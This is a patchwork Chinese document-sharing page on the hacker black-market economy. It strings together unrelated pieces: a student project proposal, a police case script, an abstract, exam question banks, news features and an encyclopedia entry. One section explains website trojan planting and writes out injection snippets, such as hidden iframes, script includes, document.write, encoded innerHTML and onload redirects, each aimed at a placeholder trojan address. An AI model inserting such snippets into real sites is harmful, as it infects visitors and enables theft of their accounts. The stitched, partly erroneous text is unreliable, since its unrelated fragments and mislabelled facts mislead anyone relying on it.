黑客产业链
- 格式:doc
- 大小:111.50 KB
- 文档页数:6
中央财经大学2009年度本科生科研创新项目申报书模板注:申报人具体信息已省略项目名称:黑客产业链形成与演化的研究申请人:******:***依托单位:信息学院年级专业:07计算机科学与技术填表日期:2009年6月14日中央财经大学教务处制表申请者承诺与成果使用授权一、本人自愿申报中央财经大学2009年度本科生科研创新专项资金资助项目,认可所填写的项目申报书为有约束力的协议,并承诺对所填写的项目申报书所涉及各项内容的真实性负责,保证没有知识产权争议。
项目申请如获准立项,在研究工作中,接受学校教务处的管理,并对以下约定信守承诺:1.遵循学术研究的基本规范。
科学设计研究方案,采用适当的研究方法,如期完成研究任务,取得预期研究成果。
2.尊重他人的知识贡献。
客观、公正、准确地介绍和评论已有学术成果。
凡引用他人的观点、方案、资料、数据等,无论曾否发表,无论是纸质或电子版,均加以注释。
凡转引文献资料,均如实说明。
3.恪守学术道德。
研究过程真实,不以任何方式抄袭、剽窃或侵吞他人学术成果,杜绝伪注、伪造、篡改文献和数据等学术不端行为。
成果真实,不重复发表研究成果;对项目主持人和参与者的各自贡献均要在成果中以明确的方式标明。
4.遵守项目管理规定。
遵守《中央财经大学本科生科研创新专项资金管理办法》及其实施细则的规定。
5.明确项目研究的资助和立项部门。
研究成果发表时在醒目位置标明“中央财经大学本科生科研创新专项资金资助项目(项目编号:××××)成果”字样,项目名称和类别与项目立项通知书相一致。
6.正确表达科研成果。
按照《国家通用语言文字法》规定,规范使用中国语言文字、标点符号、数字及外国语言文字。
7.遵守财务规章制度。
合理有效使用课题经费,不得滥用和挪用,结项时如实报告经费使用情况,不报假帐。
8.按照预期完成研究任务。
项目立项获得批准的资助经费低于申请的资助经费时,同意承担项目并按预期完成研究任务。
安全防范警示录视频脚本:最近一段时间以来,利用计算机木马程序实施网络犯罪的案例不断出现,像盗取银行帐号密码、游戏装备乃至个人隐私,林林总总,让人防不胜防。
一条看不见、摸不着的黑客产业链正在形成。
有一个数据可能很多人都想不到,那就是中国的木马产业链一年的收入已经达到了上百亿元,非常惊人。
前不久,湖北麻城市警方就破获了一个制造传播木马的网络犯罪团伙。
这也是国内破获的第一个上下游产业链完整的木马犯罪案件,他们是怎么利用木马实施犯罪的?“木马”牛人被抓获归案犯罪嫌疑人杨某,今年20岁,网名:雪落的瞬间,木马程序的编写者,专门为不法分子量身编写盗取网上帐号、远程控制木马、木马下载器等各类木马产品和黑客工具,在黑客界被称为大侠,编程牛人。
麻城公安局邢大队长:“你前后写过哪些黑客软件?”犯罪嫌疑人杨某:“一个是依然下载者,一个是小耗子。
”犯罪嫌疑人韩某,22岁,网上人称黑色靓点,是木马编写作者雪落的瞬间的总代理,又被称作流量商。
湖北麻城公安局教导员邹远忠:“你主要负责什么?”犯罪嫌疑人韩某:“我主要是负责小耗子这款软件的批发、销售和代理。
”李某,网名好心情,黑色靓点的下线,行业内被称作包马人、洗信人。
负责用黑色靓点批发给他的木马程序,盗取他人QQ帐号和网络游戏帐号,并负责洗出游戏装备出售,牟取非法收益。
原本互不相识的几位犯罪嫌疑人,从2008年10月开始在网上合作制作、销售、传播木马,在不到半年的时间就非法获利200来万元。
湖北麻城警方历时一年多,从全国6个省市将他们抓获归案。
湖北麻城公安局副局长黄绍魁:“案件的案犯他们是一个有组织,有明确的分工,在网上集制作木马病毒、传播、销售木马病毒的一个非常完整的形成了一个产业链。
”说起来,可能你也不敢相信,杨某、韩某、李某这几个沆瀣一气的犯罪嫌疑人,第一次在现实生活中见面,竟然是在被警方抓到湖北麻城之后。
由此可见,这条黑客产业链有多么隐秘。
看来他们对网络犯罪已经相当熟练了,那么,这几个没碰过面的犯罪嫌疑人怎么在互联网上勾搭到一块的?他们这个黑色产业链又是怎么盗取他人帐号和隐私,大发不义之财的?事情还得从两年前发生在麻城的一个网络案件说起。
电信网络诈骗黑灰产业链犯罪隐语分析
崔蒙;吴剑
【期刊名称】《辽宁警察学院学报》
【年(卷),期】2022(24)5
【摘要】近年来,黑灰产业链成为治理电信网络诈骗犯罪的关键。
由于已形成较为完善的犯罪隐语,黑灰产业链的犯罪活动具有很强的隐蔽性。
梳理黑客技术、信息贩卖、链接渠道、资金转移等黑灰产业链环节后,可以发现电信网络诈骗黑灰产业链犯罪隐语具有三个特点:传统诈骗犯罪隐语较少,新造词比例增加;各环节之间共有犯罪隐语较少,专业性明显;各环节内部犯罪隐语初步聚合,具有一定系统性。
分析犯罪隐语的特点和规律可以帮助公安机关有效获得线索,打击电信网络诈骗犯罪。
【总页数】5页(P56-60)
【作者】崔蒙;吴剑
【作者单位】中国刑事警察学院治安学系;广元市公安局广元市反诈中心
【正文语种】中文
【中图分类】D917.6
【相关文献】
1.河北邢台严打电信诈骗"黑灰产业链"抓获团伙成员84人
2.如何避免成为电信网络诈骗黑灰产业链条中的"工具人"
3.河南严查网络诈骗黑灰产业链重点打击"两卡"违法犯罪
4.四川自贡警方打掉涉电信诈骗黑灰产业链
5.全国公安机关严打电信网络诈骗及其背后黑灰产业链取得显著成效
因版权原因,仅展示原文概要,查看原文内容请购买。
网络安全笔试题库(附答案)网络安全培训考试题一、单选题1、当访问web网站的某个页面资源不存在时,将会出现的HTTP状态码是—D—A、 200B、 302C、401D、404状态码:是用以表示网页服务器HTTP响应状态的3位数302:请求的资源现在临时从不同的URI响应请求。
401: Bad Request语义有误,当前请求无法被服务器理解。
除非进行修改,否则客户端不应该重复提交这个请求。
404: Not Found请求失败,请求所希望得到的资源未被在服务器上发现。
2、下列哪些不属于黑客地下产业链类型?—C—A、真实资产盗窃地下产业链B、互联网资源与服务滥用地下产业链C、移动互联网金融产业链D、网络虚拟资产盗窃地下产业链无地下产业链关键词3、许多黑客攻击都是利用软件实现中的缓冲区溢出的漏洞,对此最可靠的解决方案是什么?—C—(A)安装防火墙(B)安装入侵检测系统(C)给系统安装最新的补丁(D)安装防病毒软件4、下列哪类工具是日常用来扫描web漏洞的工具?—A—A、 IBM APPSCANB、 Nessus目前全世界最多人使用的系统漏洞扫描与分析软件C、NMAP Network Mapper是Linux下的网络扫描和嗅探工具包D、X-SCAN国内安全焦点出品,多线程方式对指定IP地址段(或单机)进行安全漏洞检测5、下列哪一项不是黑客在入侵踩点(信息搜集)阶段使用到的技术?—D—A、公开信息的合理利用及分析B、 IP及域名信息收集C、主机及系统信息收集D、使用sqlmap验证SQL注入漏洞是否存在6、常规端口扫描和半开式扫描的区别是? BA、没什么区别B、没有完成三次握手,缺少ACK过程C、半开式采用UDP方式扫描D、扫描准确性不一样7、下列哪一个选项不属于XSS跨站脚本漏洞危害:—C—A、钓鱼欺骗B、身份盗用C、SQL数据泄露D、网站挂马跨站脚本攻击(也称为XSS)指利用网站漏洞从用户那里恶意盗取信息。
黑客是怎样“挂马”的?网页木马在本质上是一个Web页,但是又和普通的Web页面有很大的区别,首先就是由于其特殊性,网页木马无法光明正大地存在,只能隐藏在正常的Web页面中。
把网页木马嵌入到正常的网页中的行为,就是俗称的“挂马”。
挂马并不是仅仅将恶意代码写入正常网页这么简单,因为对于挂马者来说,希望网页木马的生存时间能尽可能地长,按照现在的黑客产业链的黑市价格,在一个大型社区网站挂一个小时的网页木马就需要几千元人民币,所以为了躲避管理员的检查,挂马的黑客们绞尽脑汁,网页木马的隐藏技术也因此得到了极大的发展,大致有以下几种。
(1)在页面插入一个隐藏的框架:在网页中插入一段如下的HTML代码:<iframe src=http://网页木马地址width=0 height=0></iframe>,其中width和height属性为0意味着该框架是不可见的,受害者若不查看源代码很难发现网页木马。
这个方法也是挂马最常用的一段代码,但是随着网站管理员和广大网民安全意识的提高,只要在源代码中搜索iframe这个关键字,就很容易找到网页木马的源头。
(2)利用JavaScript引入网页木马:相比iframe这个标签,<SCRIPT src="http://xx.js" type=text/javascript>这段代码就显得更加隐蔽,因为几乎95%的网页中都会出现类似的script 标签,利用js引入网页木马也有多种方法:*在js中直接写出框架网页木马,示例代码如下:document.write("<iframe width='0' height='0' src='网页木马地址'></iframe>");*指定language的属性为"JScript.Encode",还可以引入其他扩展名的js代码,这样就更加具有迷惑性,示例代码如下:<SCRIPT language="JScript.Encode" src=http://www. /mm.jpg></script>;*利用js更改body的innerHTML属性,引入网页木马,如果对内容进行编码的话,不但能绕过杀毒软件的检测,而且增加了解密的难度,示例代码如下:op.document.body.innerHTML=top.document.body.innerHTML+'\r\n<iframe src="http://网页木马地址/%22%3E%3C/iframe%3E';*利用JavaScript的window.open方法打开一个不可见的新窗口,示例代码如下:<SCRIPT language=javascript>window.open("网页木马地址","","toolbar=no, location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");</script>;*利用URL欺骗,示例代码如下:a href="(/迷惑用户的链接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的正常内容</a>:<SCRIPT Language="JavaScript">function www_163_com (){var url="网页木马地址";open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no, scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");}</SCRIPT>(3)利用body的onload属性引入网页木马:使用如下代码就可以使网页在加载完成的时候跳转到网页木马的网址<body onload="window.location='网页木马地址';"></body>。
国家信息化培训网络安全考试题国家信息化培训网络安全考试题(选择题)在日常学习、工作生活中,我们都不可避免地会接触到试题,借助试题可以检测考试者对某方面知识或技能的掌握程度。
一份好的试题都具备什么特点呢?以下是店铺收集整理的国家信息化培训网络安全考试题,欢迎阅读,希望大家能够喜欢。
国家信息化培训网络安全考试题(选择题)1、TELNET协议主要应用于哪一层()A、应用层B、传输层C、Internet层D、网络层2、一个数据包过滤系统被设计成允许你要求服务的数据包进入,而过滤掉不必要的服务。
这属于()基本原则。
A、最小特权B、阻塞点C、失效保护状态D、防御多样化3、不属于安全策略所涉及的方面是()。
A、物理安全策略B、访问控制策略C、信息加密策略D、防火墙策略4、对文件和对象的审核,错误的一项是()A、文件和对象访问成功和失败B、用户及组管理的成功和失败C、安全规则更改的成功和失败D、文件名更改的成功和失败5、WINDOWS主机推荐使用()格式A、NTFSB、FAT32C、FATD、LINUX6、UNIX系统的目录结构是一种()结构A、树状B、环状C、星状D、线状7、在每天下午5点使用计算机结束时断开终端的连接属于()A、外部终端的物理安全B、通信线的物理安全C、偷听数据D、网络地址欺骗8、检查指定文件的存取能力是否符合指定的存取类型,参数3是指()A、检查文件是否存在B、检查是否可写和执行C、检查是否可读D、检查是否可读和执行9、()协议主要用于加密机制A、HTTPB、FTPC、TELNETD、SSL10、不属于WEB服务器的安全措施的是()A、保证注册帐户的时效性B、删除死帐户C、强制用户使用不易被破解的密码D、所有用户使用一次性密码11、DNS客户机不包括所需程序的是()A、将一个主机名翻译成IP地址B、将IP地址翻译成主机名C、获得有关主机其他的一公布信息D、接收邮件12、下列措施中不能增强DNS安全的是()A、使用最新的BIND工具B、双反向查找C、更改DNS的端口号D、不要让HINFO记录被外界看到13、为了防御网络监听,最常用的方法是()A、采用物理传输(非网络)B、信息加密C、无线网D、使用专线传输14、监听的可能性比较低的是()数据链路。
本月人物另类的“校园黑客”上高三时,陈良迷上了黑客。
一起为高考奋斗的同学们不知道,这名学习尖子早在高一就开始尝试破解软件。
父母禁止陈良使用电脑。
在长辈的眼里,高三这个时间节点对孩子来说,是决定未来的时刻。
倒腾电脑的时间少了,但迷上电脑技术这件事让陈良找到了兴趣,上海交大信息安全学院成了他的高考第一志愿。
本科毕业后,他顺利考入复旦大学攻读软件工程硕士专业,高等教育的校园遂成为陈良黑客生涯的起点。
大学毕业后,陈良的第一份工作是担任微软安全响应中心高级安全分析员。
在别人看来枯燥的工作,在他眼里却是精彩无限。
在这里,陈良接触到了大量实际应用中的真实漏洞和系统问题,并认识了一群志同道合的朋友。
2011年,陈良和小伙伴们离开微软,成立了碁震(上海)云计算科技有限公司(Keen)。
八个志同道合的同伴凑了几十万元启动资金,在浦东租了一间六七十平方米的民宅,开始创业。
他们专做高级别的安全信息研究,彼时,类似业务的公司全国独此一家,主要是为互联网和软件厂商测试系统安全,提供解决方案。
虽说物以稀为贵,但和黑客产业链相比,走正道的陈良赚钱不易。
“我曾经向某公司通报了自己发现的漏洞和补救方法,对方连公开致谢都没有,私下发条短信‘谢谢参与’就已经算是靠谱的了。
”还有一件事情让陈良感触尤深。
一个同事向国内某互联网巨头公司告之其播放器存在安全漏洞,并提供了解决方案,该公司给那位同事的最终奖励是一万元。
要知道,若他将漏洞和攻击方法抛给黑客产业链,酬劳或许是100倍,甚至1000倍。
若是这样,产生漏洞的公司可能要承担的损失,至少要以千万元计。
由于待遇不高,陈良的大学同学们纷纷转行,毕业后真正从事信息安全的仅两人,如今只有陈良一人了。
初夏的上海潮湿闷热,处于一楼的办公地点时有老鼠出没,八个“技术宅”白手起家,苦中作乐,愣是把公司撑了下来。
几年来,这支团队调查和处理过超过两千起国内外信息安全危机。
这群“技术宅”各有所长,有人擅长攻击,有人擅长补漏洞,有人擅长做信息安全产品。
网络黑产治理的现状分析和对策研究【摘要】网络黑产已经成为一个严重的社会问题,其带来的危害不容忽视。
本文首先介绍了网络黑产的定义和重要性,指出了其对社会和个人的危害。
随后对网络黑产治理的现状进行了分析,探讨了网络黑产的发展现状以及当前面临的挑战。
接着提出了加强网络黑产治理的对策,包括提升监管力度和利用新技术应对黑产活动。
在结论部分重申了网络黑产治理的重要性,探讨了未来的发展方向,并总结了网络黑产治理的关键挑战和应对策略。
通过本文的研究和分析,希望能够引起社会各界对网络黑产问题的重视,并共同努力加强治理措施,构建一个更加清朗的网络环境。
【关键词】网络黑产治理、现状分析、对策研究、重要性、定义、危害、发展现状、挑战、新技术应用、发展方向、关键挑战、应对策略。
1. 引言1.1 网络黑产治理的重要性网络黑产治理的重要性在当今社会日益凸显。
随着互联网的普及和发展,网络黑产问题日益突出,给社会稳定和人民生活带来了严重威胁。
网络黑产活动不仅仅涉及黑客攻击、网络欺诈等传统领域,还涉及到网络犯罪、网络诈骗等新型犯罪行为,给个人信息安全、网络安全、金融安全等方面造成了重大危害。
网络黑产治理的重要性主要体现在以下几个方面:网络黑产治理关乎国家安全和社会稳定。
网络黑产行为不仅仅是技术问题,更是国家安全和社会稳定的重要因素。
网络黑产治理关乎个人信息和财产安全。
在网络时代,个人信息泄露和财产损失是网络黑产活动的主要危害。
网络黑产治理关乎经济发展和产业竞争。
网络黑产不仅仅危害个人和社会安全,也会对国家经济发展和产业竞争造成严重影响。
加强网络黑产治理,打击网络黑产活动,维护网络安全和信息安全,已经成为当务之急。
只有通过制定更加严格的法律法规,加强执法力度,推动技术创新和协作,才能有效应对网络黑产问题,保障人民利益,促进社会稳定和经济繁荣。
1.2 网络黑产的定义网络黑产是指利用互联网技术和平台从事非法、有害或破坏性活动的产业。
通常表现为网络犯罪行为,包括但不限于网络欺诈、网络盗窃、网络侵犯隐私、网络病毒传播等行为。
qq盗号黑色产业链(信封号暴利项目解析) qq盗号黑色产业链,本文为信封号暴利项目解析。
无论你是从事过互联网的,或者是没有从事互联网的。
只要你接触过互联网,你肯定接触过有一些灰色地带,其中QQ引流引发的灰色地带很多人都不陌生。
不管是QQ发来的一些诱惑头像的好友请求,还是好友的QQ被盗向你发送问借钱的信息,这都是QQ里的灰色地带,据我所知,盗取Q号这系列的事情很多,到底是怎样的利益驱动着这些情况的发生?都说掌握了流量,就掌握了互联网,QQ的盈利主要是通过自己的社交属性,把流量引入到游戏产品中,这在一定程度上让很多企业和个人通过QQ引流激活自己的产品或者说赚钱。
QQ拥有如此巨大的用户基数,它本身就是一个产品引流的入口,甚至可以说QQ 这个产品本身任何可以曝光的地方,都会是产品引流的机会。
也正因为有这些QQ引流的机会,所以会产生一系列的灰色地带产业,今天给大家分享一些QQ灰色产业,仅供揭秘,不提倡操作。
1、陌生好友发送的诱人信息很多时候用户都会通过在线查找功能来添加好友添加群,甚至是公众号,细想一下,基本每个用户都会用到的功能啊,加上QQ庞大的用户数,所以这个肯定是个绝佳的引流入口。
比如你搜下“美女”关键字,群,好友,公众号都能搜到不少。
可以看到这里一大堆的诱惑头像,认真观察还可以发现有些在头像那里就打了相关的广告,比如网址,相关说明等等。
再进一步,等你加了好友加了群之后,就会发现里面一大堆的诱人东西发出来,当然这里不方便贴图,不过本质还是引流而已,都是在推广CPA、CPS之类的。
还有很多用户都会尝试在QQ上搜索自己偶像的名字,于是有些人会利用这种用户心理,注册大量的以明星名字命名的号码,从而获得流量,这也是一种手法,不过感觉这种手段在现在已经过时了,可能在以前还比较好。
当然还会有一些别的入口,比如说加群,群内聊天,通过技术手段获取对方群成员所有号码,定向打开临时对话窗口,主动加对方好友等等。
虽然这些手段看起来很简单,我们可能不会相信这样做可以获取到流量,可是事实却一直能获取到流量,如果你加了相关的群,会发现群里的管理员经常发一些诱人的网址,推广各种APP 。
B32“艳照”大生意8月底,包括詹妮弗劳伦斯、凯特阿普顿等人在内的101位好莱坞女星的大量私密照被黑客盗窃并发布到4c ha n 网站上。
有分析猜测,可能是苹果的ic loud 存在安全漏洞,导致黑客侵入窃取明星私照。
之后FBI 加入调查,被指为劳伦斯照片泄密者的布莱恩哈马德否认自己曾入侵iCloud ,他说:“我只是从别处转帖了这些照片,真正的罪魁祸首正在4c ha n 上断断续续地发布新帖,此人才是真正的幕后黑客。
”随后,一名神秘男子站出来称自己是幕后黑手,曾组织多名黑客窃取数百位明星裸照。
调查正在进行,私照仍在四处蔓延。
色情网站、转载者、下载者纷纷冒头,一化名为ROX 的色情网站“熟客”告诉记者,色情网站不仅让顾客花钱,还能让顾客赚钱。
而泄密者也是浏览者的布莱恩哈马德宣称自己上传照片,为的是赚取“比特币”。
“所有色情网站都在高价悬赏‘限制级’图片或者视频,限制级别越高,被曝照的人知名度越高,报酬越高。
”ROX 称,大多色情网站与黑客有“私下来往”,发一些一线明星私照“标”,猎取后可领得百万酬劳。
其实,基于明星隐私的黑色产业链起步并不早。
2004年,由大名鼎鼎的帕里斯希尔顿时任男友Ric k S a lomon 炮制的一张名为巴黎一夜的DV D 卖掉70万张,让很多人看到了其中的暴利空间。
明星不雅照创造的利润超出很多人想象。
当年国外有IT 人士接受采访时就曾表示,像詹妮弗洛佩兹或娜塔莉波特曼这样的大牌明星,一张裸照可以轻松赚到百万美元。
原因很简单,就是广告点击。
据悉,包括国外和国内的诸多门户网站,其盈利模式都是通过广告点击的分成。
国外将明星艳照称为“一巴掌”——five -time r ,因为它能让网站的流量在短时间内翻五倍以上。
而如果是一线明星,这个流量数据甚至能达到10倍。
其流量背后,当然就是金钱。
“为高额利益所驱,黑客们才知法犯法。
”山东师范大学社会学教授程方清称,“人对窥私的欲望永不停止,这促使色情产业链不断完备。
黑客产业链
所属分类:社会问题程序黑客
摘要:
黑客产业链是指黑客利用木马程序盗取QQ、网络游戏、银行账号、信用卡账号等等个人资料,并从中牟取金钱利益的产业链。
产业链是产业经济学中的一个概念,是各个产业部门之间基于一定的技术经济关联,并依据特定的逻辑关系和时空布局关系客观形成的链条式关联关系形态。
编辑摘要
目录[隐藏]
∙1 概述
∙2 形成规模
∙3 获取利益
∙4 典型流程
∙5 常用手段
∙6 法制完善
∙7 危害严重
∙8 具体案例
黑客产业链-概述
背后的黑客产业链
地下黑客产业链极其庞大且分工明确,有专门提供木马程序的,有专门提供肉鸡的。
黑客产业链大致分为老板、病毒编写者、流量商、盗号者和贩卖商等多个环节,各个环节分工明确,其中“老板”处于整个链条的顶端,他对产业链的各个环节进行分工和协调。
而那些层出不穷的木马病毒程序,往往都是按照这些老板的要求,由专门编写病毒的程序员开发出来的。
无论是国内还是国外,黑客产业链不仅规模庞大,而且还出现了与传统的犯罪团伙勾相勾结的新趋势。
西方国家大多采取技术、法律和互联网安全经济模式三管齐下的治理办法。
中国除了在积极推动市场化的反病毒服务业的发展外,相关技术部门也在开发“计算机证据获
取调查系统”为黑客犯罪调查提供技术支持,毕竟要想人不知,除非己莫为。
任何黑客行为都必然会留下痕迹。
黑客产业链-形成规模
一些比较大的私服每个月都会花2-3百万元来黑对手,方式一般为,花钱雇佣数万台甚至几十万台“肉鸡”发送巨量数据集中攻击对手,让对手的服务器瘫痪,按照一些地下市面价格,1G的流量打1个小时约4-5万元。
一个完整的产业链条,一个盗号木马,通过这样一条制造、贩卖、传播、使用、盗号、销赃的流水线,把一连串虚拟世界的数字代码变成了真金白银,产业链上各个环节分工明确,黑客可以根据自己的专长,专门负责某个环节,而更让人担忧的是,各种各样的计算机木马病毒、黑客技术,在网络中泛滥传播。
在网络上,充斥着形形色色的黑客论坛、内容五花八门,兜售盗号木马,买卖“肉鸡”,甚至还有专门传授黑客技术的,只要肯花钱,只需一台电脑一根网线,任何人都可以摇身一变,成为一名黑客。
黑客产业链-获取利益
黑客产业链
黑客产业链近来进一步发展和完善,同时越来越多的黑客团伙利用电脑病毒构建“僵尸网络”,用于敲诈和受雇攻击。
如今,这条“黑客产业链”每年的整体利润已高达数亿元。
由于互联网上的病毒地下交易市场初步形成,获取利益的渠道更为广泛。
病毒模块、僵尸网络、被攻陷的服务器管理权等都被用来出售,很多国内黑客开始利用
拍卖网站、聊天室、地下社区等渠道,寻找买主和合作伙伴,取得现金收入。
整个行业已形成一个完整的循环圈,大量的人才、技术和资金进入到这个黑色行业中。
黑客产业链-典型流程
黑客产业链的典型流程有这样两个:
一是黑客侵入个人或企业电脑——窃取机密资料———在互联网上出售——获取金钱;
二是黑客侵入大型网站,在网站上植入病毒———用户浏览网站后中毒,网游账号和装备被窃取———黑客把账号、装备拿到网上出售——获取金钱。
“肉鸡”,是黑客产业里的一个专用名词。
在产业链中,有专门一些人,他们把一些带有远程控制功能的病毒程序通过网络植入进别人的电脑中,这些电脑就成了他们手中的猎物,任由他们操纵控制,而且主人往往很难察觉,圈子里的人把这些被控制住的电脑称做“肉鸡”,那些控制肉鸡的人则被称为流量商。
黑客抓“鸡”的方法很多,从技术上来说并不复杂,最常用的方法是,事先在一个访问量比较多的网页上种植一个木马程序,只要有人访问这个页面,那么访问者的电脑就会被这个木马程序入侵,黑客就可以通过这个木马程序控制访问者的电脑。
黑客产业链-常用手段
1、具有病毒程序编写能力的“黑客”,在圈内被称为“卖枪者”。
他们的主要任务是制造出黑客工具,然后将这些黑客工具卖给下游的买家。
买家花费几百元至数千元不等的价格在“卖枪者”手中买到“黑客程序”——目前大多数是木马病毒。
下一步的动作就是将这些病毒植入特定的网站,这个步骤叫“挂马”,可以由买家自己完成,买家若没有能力完成,则可以聘请专门的“挂马者”完成。
背后的黑客产业链
2、“挂马”的对象一般是一些有一定流量且有安全漏洞的网站,这些网站一旦被植入木马,其浏览者就很有可能在不知不觉中感染木马病毒,其电脑上有价值的信息也就可能落入买家之手。
另一种“挂马”的方式则是通过垃圾邮件,或者在论坛上张贴含有木马病毒的文件吸引用户下载。
一旦成功,大量的目标信息就会源源不断地被黑客工具所盗取。
3、批量传送给黑客信息在圈内叫做“信封”,根据产品不同分为“装备信封”、“QQ信封”等等。
“信封”的销售就相当于产品销售中的批发环节。
一般黑客会从中扫出最有价值的信息,比如位数较短或级别较高的QQ号码。
然后这些经过筛选的“二手信封”就流入“零售环节”。
“零售商”将“信封”解封后,通过BBS甚至某些电子商务网站等渠道对盗来的Q币、网游装备等“虚拟财产”进行最终的销售。
4、“卖枪者”、“挂马者”、“大买家”、“零售商”,每个环节都有利可图,经济利益让“黑客”这一曾经有些“技术骑士”色彩的名词迅速污名化。
在这个链条中,真正赚钱的是大买家(即‘信封’的盗取者),如果用得好,一个月赚几万元不是难事,甚至有人年收入过千万元。
就这样,通过少则2~3人,多则10余人的合作,源源不断的有价信息通过这条黑暗的链条被盗取,然后卖往世界各地。
据了解,“熊猫烧香”的程序设计者李俊,每天入账收入近1万元,被警方抓获后,承认自己获利上千万元。
黑客产业链-法制完善
如今中国感染木马和僵尸网络恶意代码的数量巨大,面临的网络安全问题相当严重。
2009年6月1日,工信部组织制定的《木马和僵尸网络监测与处置机制》正式实施。
这是工信部成立以来,首次发布专门针对互联网网络安全的部门文件。
该文件规定,木马和僵尸网络事件分为特别重大、重大、较大、一般共四级,而对于涉嫌犯罪的木马和僵尸网络事件,将报请公安机关依法调查处理。
但事实上,目前中国还没有直接针对木马病毒的相关法律,也没有相关的解释条款来对它进行定义。
现有法律法规对网络安全犯罪缺少具体司法解释,缺少具体定罪量刑标准,这让黑客的违法成本大大降低。
要惩治黑客产业链,有必要出台统一的司法解释,明确针对此类黑客案件应该参照的法条,从定罪量刑上达成共识。
黑客产业链-危害严重
背后的黑客产业链
挂马就是黑客入侵了一些网站后,将自己编写的网页木马嵌入被黑网站的主页中,利用被黑网站的流量将自己的网页木马传播开去,以达到自己的目的。
例如
很多游戏网站被挂马,黑客的目的就是盗取浏览该网站玩家的游戏账号。
2003年、2004年那时候漏洞攻击比较多,黑客主要是利用漏洞攻击进行营利,到2006年的时候,流氓软件流行,一些黑客利用流氓软件在普通网民的电脑中安装流氓软件盈利。
而到2008年、2009年,操作系统的补丁越来越多,并且在政府有关部门的打击下,流氓软件也逐渐退出。
现在黑客就利用在网站上放置木马病毒,让用户在浏览网站的时候把病毒悄悄安装到用户的电脑中,然后偷取用户包括网络游戏账号、密码等资料进行售卖盈利,或者利用病毒把一些商业广告软件装进用户机器中。
每成功在一台计算机上安装一个这样的软件,就可以得到0.3元,我国近3亿的网民数量给黑客带来了无限想象的利润空间。
这个黑色行业带来的破坏力是巨大的。
据国家计算机网络应急技术处理协调中心估计,目前这条“黑色产业链”的年产值已超过2.38亿元人民币,造成的损失则超过76亿元。
黑客产业链-具体案例
黑客产业链
2008年,中国警方破获的最大一起网络黑客犯罪案件中,犯罪嫌疑人就是利用一款名为“大小姐”的木马病毒来盗取他人游戏账号,这个“大小姐”木马程序可以针对40多款网络游戏进行盗号,担负老板角色的犯罪嫌疑人王某通过这个木马,非法获利1400余万元。
如此疯狂地作案并且屡屡得手,使得“大小姐”木马在这个产业链当中,竟有了品牌效应。
2009年5月19日,江苏、安徽等6省区出现罕见的断网事件,大量网民无法正常访问网站。
断网事件背后的一个犯罪事实是:部分商家为打击竞争对手,雇用黑客发动网络攻击。
而这些黑客通常会挟持大量被感染病毒的电脑,即所谓的“肉鸡”,一起发动大规模黑客攻击。
这次断网事件祸起网络游戏“私服”市场。
“私
服”因利益纠葛,相互火并的现象极为普遍,一些实力雄厚的“私服”甚至每月都会花费两三百万元打击竞争对手。